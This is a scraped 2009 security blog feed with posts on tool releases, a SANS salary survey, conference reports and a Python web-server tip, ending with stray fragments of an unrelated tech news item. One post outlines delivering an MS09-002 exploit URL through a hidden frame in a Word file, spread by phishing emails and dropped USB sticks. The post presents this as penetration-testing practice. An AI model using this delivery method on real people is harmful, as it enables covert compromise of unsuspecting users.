height="295"></embed></object></span></p> <p style="margin: 0.0px 0.0px 0.0px 0.0px; font: 12.0px Helvetica"><br /></p><p style="margin: 0.0px 0.0px 0.0px 0.0px; font: 12.0px Helvetica">Great Job from Carlos del Ojo (deepbit) for this new release</p> <p style="margin: 0.0px 0.0px 0.0px 0.0px; font: 12.0px Helvetica; min-height: 14.0px"><br /></p><p style="margin: 0.0px 0.0px 0.0px 0.0px; font: 12.0px Helvetica; min-height: 14.0px">-CMM</p>http://edge-security.blogspot.com/2009/03/proxystrike-v20-released.html[email protected] (Christian Martorella)0
- tag:blogger.com,1999:blog-6921014549873020749.post-6882978114094041892Tue, 17 Mar 2009 20:31:00 +00002011-06-21T23:19:28.203+01:00crisissalariessecurity marketSecurity Industry Salary and Certification Survey 2008<a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://www.dragoslungu.com/wp-content/uploads/image/crisis.jpg"><img style="float:right; margin:0 0 10px 10px;cursor:pointer; cursor:hand;width: 147px; height: 231px;" src="http://www.dragoslungu.com/wp-content/uploads/image/crisis.jpg" border="0" alt="" /></a><div style="text-align: justify;">Sans Institute released an excellent study about the salaries in the Security industry and relations with certifications. This is a great study for the professionals to know where they are in relation with they career. I would like to see one of these studies for Europe, this one particularly covers USA.</div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">The survey shows that the Security industry is one of less affected by the crisis, and where the companies plan to invest in this year.</div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">If someone need help for a European version, let me know.</div><div style="text-align: center;"><br /></div><div>Download <a href="http://www.sans.org/resources/salary_survey_2008.pdf">here</a></div><div><br /></div><div>Here you have some interesting bits:</div><div><br /></div><div><span class="Apple-style-span" style="font-family: Verdana; font-size: 11px; font-style: italic; line-height: 13px; "><ul style="list-style-image: url(http://www.dragoslungu.com/wp-content/themes/typoxp-reloaded-091/img/li.png); "><li style="padding-bottom: 5px; "><p style="margin-top: 10px; margin-right: 0px; margin-bottom: 10px; margin-left: 0px; ">Salaries for information security professionals are high. Over 38% of respondents earn US $100,000 or more per year.</p></li><li style="padding-bottom: 5px; "><p style="margin-top: 10px; margin-right: 0px; margin-bottom: 10px; margin-left: 0px; ">41% of the respondents said their organizations use certifications as a factor when determining salary increases.</p></li><li style="padding-bottom: 5px; "><p style="margin-top: 10px; margin-right: 0px; margin-bottom: 10px; margin-left: 0px; ">The overall mean funding for training was US $2,854 per year with a median of US $2,000 per year.</p></li><li style="padding-bottom: 5px; "><p style="margin-top: 10px; margin-right: 0px; margin-bottom: 10px; margin-left: 0px; ">Digital forensics, intrusion detection, and penetration testing are the technical topics respondents are most interested in learning in 2009.</p></li><li style="padding-bottom: 5px; "><p style="margin-top: 10px; margin-right: 0px; margin-bottom: 10px; margin-left: 0px; ">As of late November 2008, just over 79% of respondents forecast no information security personnel reductions in the next 12 months.</p></li><li style="padding-bottom: 5px; "><p style="margin-top: 10px; margin-right: 0px; margin-bottom: 10px; margin-left: 0px; ">Over 25% of respondents plan to deploy the following technologies in 2009:</p><ul style="list-style-image: url(http://www.dragoslungu.com/wp-content/themes/typoxp-reloaded-091/img/li.png); "><li style="padding-bottom: 5px; ">Configuration Management</li><li style="padding-bottom: 5px; ">SIEM (Security Information and Event Management)</li><li style="padding-bottom: 5px; ">Storage Security</li><li style="padding-bottom: 5px; ">Wireless Security Solutions</li></ul></li><li style="padding-bottom: 5px; "><p style="margin-top: 10px; margin-right: 0px; margin-bottom: 10px; margin-left: 0px; ">The best places to find an information security position are in the metro areas of Las Vegas, Nevada; Dallas, Texas; and Washington, DC.</p></li></ul></span></div><div>-CMM</div>http://edge-security.blogspot.com/2009/03/security-industry-salary-and.html[email protected] (Christian Martorella)1
- tag:blogger.com,1999:blog-6921014549873020749.post-5874678677915466465Tue, 17 Mar 2009 20:05:00 +00002011-06-21T23:19:28.203+01:00conferenceinformation gatheringmetagoofilA fresh new look into Information Gathering v2Here is the new version of my presentation "A fresh new look into Information Gathering v2" that i presented at <a href="http://www.fistconference.org/">FI</a><a href="http://www.fistconference.org/?s=8&id=16">ST Conference Barcelona</a> one week ago. It's a overview of some new sources and mostly based on Metadata and Metagoofil V2 (coming soon)<div><br /></div><div>If you have some new source or technique that want to share, you are welcome :)</div><div><br /></div><div>Download <a href="http://www.edge-security.com/docs/FIST-Conference-Christian%20Martorella-%20IG2.pdf">here</a></div><div><br /></div><div>Enjoy</div><div><br /></div><div>-CMM<div><div><br /></div></div></div>http://edge-security.blogspot.com/2009/03/fresh-new-look-into-information.html[email protected] (Christian Martorella)0
- tag:blogger.com,1999:blog-6921014549873020749.post-1571415634488081475Mon, 16 Mar 2009 20:50:00 +00002011-06-21T23:19:28.203+01:00conferencesourceSOURCE BOSTON experience<div style="text-align: justify;">I recently came back from Boston were i attended to the SOURCE Conference Boston.</div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">It was really a good conference, an excellent speaker line up, and a great environment to do networking and meet new people from the industry.</div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">The conference had a great balance between technical talks and business talks, addressing all the needs of a security professional. </div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">The conference started with an excellent speech by Peter Kuper, who gave his vision about the security market in these turbulent times. (<a href="http://raffy.ch/blog/2009/03/11/the-security-market-as-seen-by-peter-kuper/">speech transcript here</a>).</div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">Then during the conference, i attended the followings talks:</div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">How Microsoft fixes security Vulnerabilities, interesting insight about what happens behind the courtain of a security update.</div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">Politically Motivated Denial of Service Attacks, Jose Nazario.</div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">Mac OS Xploitation, Dino Dai Zovi (Dino promised to transform OSX in a first class citizen in Metasploit)</div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">Attacking Layer 8: Client Side penetration testing, <a href="http://carnal0wnage.blogspot.com/">Chris Gates</a> and Vince Marvelli. They show how easy is to own the end user.</div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">DNS: Towards the Secure Infrastructure, Dan Kaminsky. This was the same presentation as DC.</div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">Day 2:</div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">L0phtCrack 6 Release</div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">400 apps in 40 days, Sahba Kazerooni. He explained how he faced a weird project of 400 applications in 40 days.</div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">Get rich or Die Trying, Jeremiah Grossman. A cool talk on how to earn money exploiting different application vulnerabilities.</div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">Vulnerabilities in Application Interpreters and Runtimes. Erik showed some vulnerabilities on different widely deployed interpreters and runtimes.</div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">Day 3:</div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">Dissecting Foreign Web Attacks, Val Smith. Val analyzed a web attack from start to end, great info in his talk. </div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">That's all for 3 days.</div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">Greets to Chris Gates, Vince Marvelli, Val Smith, Jose Nazario, Stacy Thayer, Christien Rioux, and everyone that i met at Boston.</div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">Now <a href="http://www.sourceconference.com/index.php/source-barcelona-2009/barc-info">SOURCE Barcelona</a> is next, in the coming days we will launch the Call for papers, don't miss this great conference in this great city :)</div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">-CMM</div>http://edge-security.blogspot.com/2009/03/source-boston-experience.html[email protected] (Christian Martorella)0
- tag:blogger.com,1999:blog-6921014549873020749.post-4727679389941456496Fri, 06 Mar 2009 22:54:00 +00002011-06-21T23:19:28.203+01:00conferencemetagoofilFist Conference - Source Boston<div style="text-align: left;">The<a href="http://www.fistconference.org/?s=6&t=1"> FIST Conference</a> is over, i just came home and now i'm preparing my backpack for tomorrows trip to NY and Boston, were i will attend <a href="http://www.sourceconference.com/">SOURCE Conference</a> Boston :)</div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">The talk of Jay Libove was very interesting, he made us think over the ethics in our career, and </div><div style="text-align: justify;">Vicente Diaz talk about eCrime economy showin</div><div style="text-align: justify;">g some unbelievable facts and numbers, we are really outnumbered... My talk was about Information Gathering, Metadata and Social Networks, showing how easy is to obtain information about individuals and companies.</div><div style="text-align: justify;"><br /></div><div>The slides will be available soon at www.fistconference.org</div><div><br /></div><div>Here is a screenshot of the next Metagoofil version that i showed today:</div><div style="text-align: center;"><br /></div><div style="text-align: center;"><br /></div><div style="text-align: center;"><br /></div><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 242px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgWXRep6hOww7jcLyTbLL7kg1g1SNaAxU11_9GuWs6GyKzjevev3FxDyz5HaeNs6WT_zVulKqbCRdHU3kxzyq_M4hoEuzlRXS0Prp79DHvetLSoBR-0lqZEClVAbWM62UEzu2fZm0Ku-qfQ/s320/Metagoofilv2.png" border="0" alt="" id="BLOGGER_PHOTO_ID_5310215233060542210" /><br /><div style="text-align: center;"><div style="text-align: left;"><br /></div><div style="text-align: left;"><br /></div></div><div style="text-align: left;">Yes it has the "Analyze local files" that many of you asked for :)</div><div style="text-align: left;"><br /></div><div style="text-align: left;">-CMM</div>http://edge-security.blogspot.com/2009/03/fist-conference-source-boston.html[email protected] (Christian Martorella)0
- tag:blogger.com,1999:blog-6921014549873020749.post-6311159874624064738Thu, 05 Mar 2009 07:53:00 +00002011-06-21T23:19:28.204+01:00toolswardialingWarvox: Wardialing refreshed<a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://www.warvox.org/logo4.png"><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 450px; height: 157px;" src="http://www.warvox.org/logo4.png" border="0" alt="" /></a><br /><div style="text-align: center;"><br /></div><div><br /></div><div style="text-align: justify;">The people of Metasploit released a new tool for performing Wardialing attacks. You must be wondering why a new wardialing tool in these times?</div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">Well they came with a new idea, on using Voip services to perform the scans and they claim to reach 10.000 numbers in 8 hours aprox. No modem needed, yes you read right.</div><div style="text-align: justify;"><br /></div><div><span class="Apple-style-span" style=" line-height: 22px; font-family:Tahoma;font-size:15px;"><blockquote>One of the great things about the WarVOX model is that once the data has been gathered, it is archived and available for re-analysis as new signatures, plugins, and tools are developed.</blockquote></span></div><div>Also is interesting the analysis they perform, because they identify more things than a modem attached to a telephone line:</div><div><br /></div><div><span class="Apple-style-span" style=" line-height: 22px; font-family:Tahoma;font-size:15px;"><blockquote>This model allows WarVOX to find and classify a wide range of interesting lines, including modems, faxes, voice mail boxes, PBXs, loops, dial tones, IVRs, and forwarders. WarVOX provides the unique ability to classify all telephone lines in a given range, not just those connected to modems, allowing for a comprehensive audit of a telephone system.</blockquote></span></div><div><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 450px; height: 350px;" src="http://www.warvox.org/gallery/results.png" border="0" alt="" /><br /></div><div><br /></div><div>The tool is coded in ruby and you can download <a href="http://www.warvox.org/">here</a></div><div><br /></div><div>-CMM</div>http://edge-security.blogspot.com/2009/03/warvox-wardialing-refreshed.html[email protected] (Christian Martorella)0
- tag:blogger.com,1999:blog-6921014549873020749.post-127295181253395009Tue, 03 Mar 2009 22:06:00 +00002011-06-21T23:19:28.204+01:00tipstoolsQuick tip: Sharing a directory over the web easilySometimes you need to share a file, show someone a file, serve a client side exploit in a local network, but you don't have a web server on your machine, or don't want to upload the file to a server... Here is a very useful tip to run a web server serving the actual directory with Python:<div><br /></div><div><span class="Apple-style-span" style="font-family: Verdana; font-size: 13px; ">shell>python -c "import SimpleHTTPServer;SimpleHTTPServer.test()"</span></div><div><span class="Apple-style-span" style="font-family:Verdana;font-size:100%;"><span class="Apple-style-span" style="font-size: 13px;"><br /></span></span></div><div><span class="Apple-style-span" style="font-family:Verdana;font-size:100%;"><span class="Apple-style-span" style="font-size: 13px;">there is an easier way:</span></span></div><div><span class="Apple-style-span" style="font-family:Verdana;font-size:100%;"><span class="Apple-style-span" style="font-size: 13px;"><br /></span></span></div><div><span class="Apple-style-span" style="font-family:Verdana;font-size:100%;"><span class="Apple-style-span" style="font-size: 13px;">shell>python -m SimpleHTTPServer</span></span></div><div><span class="Apple-style-span" style="font-family:Verdana;font-size:100%;"><span class="Apple-style-span" style="font-size: 13px;"><br /></span></span></div><div><span class="Apple-style-span" style="font-family:Verdana;font-size:100%;"><span class="Apple-style-span" style="font-size: 13px;">By the default it will use the port 8000.</span></span></div><div><span class="Apple-style-span" style="font-family:Verdana;font-size:100%;"><span class="Apple-style-span" style="font-size: 13px;"><br /></span></span></div><div><span class="Apple-style-span" style="font-family:Verdana;font-size:100%;"><span class="Apple-style-span" style="font-size: 13px;">You can create an alias for easy launching</span></span></div><div><span class="Apple-style-span" style="font-family:Verdana;font-size:100%;"><span class="Apple-style-span" style="font-size: 13px;"><br /></span></span></div><div><span class="Apple-style-span" style="font-family:Verdana;font-size:100%;"><span class="Apple-style-span" style="font-size: 13px;">More shell tricks in <a href="http://www.shell-fu.org">Shell-fu.org</a></span></span></div><div><span class="Apple-style-span" style="font-family:Verdana;font-size:100%;"><span class="Apple-style-span" style="font-size: 13px;"><br /></span></span></div><div><span class="Apple-style-span" style="font-family:Verdana;font-size:100%;"><span class="Apple-style-span" style="font-size: 13px;">-CMM</span></span></div>http://edge-security.blogspot.com/2009/03/quick-tip-sharing-directory-over-web.html[email protected] (Christian Martorella)0
- tag:blogger.com,1999:blog-6921014549873020749.post-3102942171681415779Mon, 02 Mar 2009 23:19:00 +00002011-06-21T23:19:28.204+01:00client sideexploitshackingmetasploittoolsClient Side exploit Delivery - Word files<div style="text-align: justify;"><br /></div><div style="text-align: justify;">Today i will do a brief post about how you can deliver an exploit URL to your target.</div><div style="text-align: justify;">I was reading the <a href="http://isc.sans.org/diary.html?storyid=5899">SANS storm post</a> about MS09-002 XML/DOC initial infection vector, and i wanted to try it. Here is the information from SANS:</div><div style="text-align: justify;"><br /></div><div><img style="text-align: justify;display: block; margin-top: 0px; margin-right: auto; margin-bottom: 10px; margin-left: auto; cursor: pointer; width: 562px; height: 304px; " src="http://handlers.sans.org/bzdrnja/xml.png" border="0" alt="" /><div style="text-align: justify;"><br /></div></div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">After many failed attempts and some research, i stumble and <a href="http://www.securityfocus.com/archive/1/492231">old post</a> about a XSS in Word documents where the steps to accomplish the XSS where:</div><div style="text-align: justify;"><br /></div><div style="text-align: justify;"><br /></div><div><img style="text-align: justify;display: block; margin-top: 0px; margin-right: auto; margin-bottom: 10px; margin-left: auto; cursor: pointer; width: 320px; height: 87px; " src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEht0nLx6kCCngtdtGYFUUL6fIW0XwBCQDj_0tDR5tYiU-HxteQWZ88ugmPz6R_bBxZszy3nX4hxNocQvNlzonM1X8gnQW6Rf51TcDKjnrQl8ChTHjR0eogNA-rUIULaKV3eHaQmWVvuGTaf/s320/ishot-2.png" border="0" alt="" id="BLOGGER_PHOTO_ID_5308737245259269730" /><div style="text-align: justify;"><br /></div></div><div><div style="text-align: justify;">The html file content:</div><div style="text-align: justify;"><br /></div><img style="text-align: justify;display: block; margin-top: 0px; margin-right: auto; margin-bottom: 10px; margin-left: auto; cursor: pointer; width: 320px; height: 48px; " src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjXaG9UAA7MPptOgpxaUGfZn0fuFVFOJw8J3TYXQIK4vq4DU-2poyhRbAmt5XIRkpogJLIEDERLkhW6vSJdzIzSMS6h7Qhz34tWmhNYBuLl5h4xb6qkz9ZsTAgDjV0-UbflVx_svFMBDW9Z/s320/ishot-3.png" border="0" alt="" id="BLOGGER_PHOTO_ID_5308737457594416834" /></div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">So if you change the value code by your exploit serving URL, you will get your exploit served when the target open the Word document.</div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">In this example i changed the value by "http://www.google.com" and the results when opening the word file:</div><div style="text-align: left;"><img style="text-align: justify;display: block; margin-top: 0px; margin-right: auto; margin-bottom: 10px; margin-left: auto; cursor: pointer; width: 274px; height: 320px; " src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjE05pMdiVSHGRj-jvl3AKIxdayQvkdAkdhpIJhdr2W03g_iRd0-HbmL75xa4dm3qtUno2529XutSuVTtGA0hj_NECA-_DgYFVseJoa0tyS5bK9CfjJkGkvjgs77Vk9Er9AYs8Uj5ooTRb8/s320/ishot-1.png" border="0" alt="" id="BLOGGER_PHOTO_ID_5308738924352474818" /><div style="text-align: justify;"><br /></div></div><div style="text-align: justify;"><br /></div><div style="text-align: justify;"> And in the next page is the little frame with the page loaded:</div><div style="text-align: justify;"><br /></div><div><img style="text-align: justify;display: block; margin-top: 0px; margin-right: auto; margin-bottom: 10px; margin-left: auto; cursor: pointer; width: 320px; height: 317px; " src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEik3QvRz8uIrtzEcDMuNWdtVZyl3RnZKwzeapYwb5XA2pojhVoeIGHddpK3kusXDEXDLEuG6j5_O5w4z94D1EJINmUGP5Z8BRnzp3KM8vJrbw-VF5ObLFqsam1nMvw4KGiOtkYaYgRisZNp/s320/ishot-2.png" border="0" alt="" id="BLOGGER_PHOTO_ID_5308739472524485394" /></div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">For doing it in a cleaner way, your page will be blank, so there will be no trace at plain sight for a typical user. Also it's possible to play with the object size and location. Also depending on the configuration the user will receive an alert saying that an Activex is trying to run.</div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">So for your next penetration test when you need to perform a targeted client side attack, fire up Metasploit, setup MS09-002 build a Word file, send emails with juicy Subjects , leave some USB sticks on the building and wait :)</div><div style="text-align: justify;"><br /></div><div style="text-align: left;">-CMM</div>http://edge-security.blogspot.com/2009/03/client-side-exploit-delivery-word-files.html[email protected] (Christian Martorella)0
- tag:blogger.com,1999:blog-6921014549873020749.post-4602706412806608766Sun, 01 Mar 2009 18:51:00 +00002011-06-21T23:19:28.204+01:00conferencehackingtoolsL0phtCrack is back with L0pht<div style="text-align: justify;">I read via Christien Rioux <a href="http://twitter.com/dildog">twitter</a>, that L0phtCrack is being reacquired by the original authors. </div><div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">They are preparing a special information session at <a href="http://www.sourceconference.com/">SOURCE Boston</a> (Thursday 10:15 am), and they will be releasing version 6. Also they will explain the story of the product from the days of L0pht, @stake, Symantec and L0pht again.</div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">Check this <a href="http://www.l0phtcrack.com/">site</a> for more info soon.</div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">I will be there for this session! </div><div style="text-align: justify;"><br /></div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">-CMM </div></div>http://edge-security.blogspot.com/2009/03/l0phtcrack-is-back-with-l0pht.html[email protected] (Christian Martorella)0
ww.engadget.com/ai/the-first-apple-intelligence-features-are-expected-to-arrive-on-october-28-144459627.html" data-ylk="elm:hdln;itc:0;pos:1;sec:strm;subsec:moreforyou;cpos:2;ct:story;g:912e2e94-f8ba-4692-8c61-f8f3cf1e5e82" data-hosted-type="HOSTED">The first Apple Intelligence features are expected to arrive on October 28
In the Power On newsletter this week, Bloomberg's Mark Gurman says Apple is targeting the end of the month for the release of iOS 18.1, which will bring Apple Intelligence to iPhone.
文章来源: https://www.engadget.com/cybersecurity/legos-website-was-hacked-to-promote-a-crypto-scam-140045757.html?guccounter=1&guce_referrer=aHR0cHM6Ly90LmNvLw&guce_referrer_sig=AQAAAD1REiXqjZBBOabLuRxhOY_ZtdGfnTPI_i0zhG34qYn5smZO7sHuQ6-Www1-fNVOgPFoqItsuiv3epYmASONgqywcnCwYjyYoKFB1pKn5CycdSIGBopfFEog5Vfgj226DxCAyaTSg0rn2ORzC4H7rJP6Hdl1BRLGAcMObXbhbq2u
如有侵权请联系:admin#unsafe.sh
